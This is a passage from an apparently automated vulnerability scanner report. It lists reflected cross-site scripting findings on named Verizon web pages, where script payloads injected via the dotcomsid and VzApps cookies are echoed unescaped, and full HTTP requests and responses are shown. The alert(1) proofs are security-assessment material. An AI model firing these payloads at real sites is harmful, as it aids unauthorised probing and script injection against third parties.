ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77952
Expires: Sat, 20 Nov 2010 02:56:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX6357f<script>alert(1)</script>71117283bfe; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6357F<SCRIPT>ALERT(1)</SCRIPT>71117283BFE </DIV>
...[SNIP]...

3.287. https://www22.verizon.com/Residential/FiOSTV/usingFiOS/usingFiOS.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/usingFiOS/usingFiOS.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a3b"-alert(1)-"75f87706d4 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/usingFiOS/usingFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=99a3b"-alert(1)-"75f87706d4; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84230
Expires: Sat, 20 Nov 2010 02:56:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:13 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "99a3b"-alert(1)-"75f87706d4"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.288. https://www22.verizon.com/Residential/TV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8583'><script>alert(1)</script>df9eda5005b was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf8583'><script>alert(1)</script>df9eda5005b; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 02:57:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf8583'><script>alert(1)</script>df9eda5005b; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF8583'><SCRIPT>ALERT(1)</SCRIPT>DF9EDA5005B ' />
...[SNIP]...

3.289. https://www22.verizon.com/Residential/TV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4c88c<script>alert(1)</script>04868af3b9a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX4c88c<script>alert(1)</script>04868af3b9a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76227
Expires: Sat, 20 Nov 2010 02:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4c88c<script>alert(1)</script>04868af3b9a; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4C88C<SCRIPT>ALERT(1)</SCRIPT>04868AF3B9A </DIV>
...[SNIP]...

3.290. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 120ad<script>alert(1)</script>163fbe4701a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX120ad<script>alert(1)</script>163fbe4701a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70905
Expires: Sat, 20 Nov 2010 02:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX120ad<script>alert(1)</script>163fbe4701a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX120AD<SCRIPT>ALERT(1)</SCRIPT>163FBE4701A </DIV>
...[SNIP]...

3.291. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

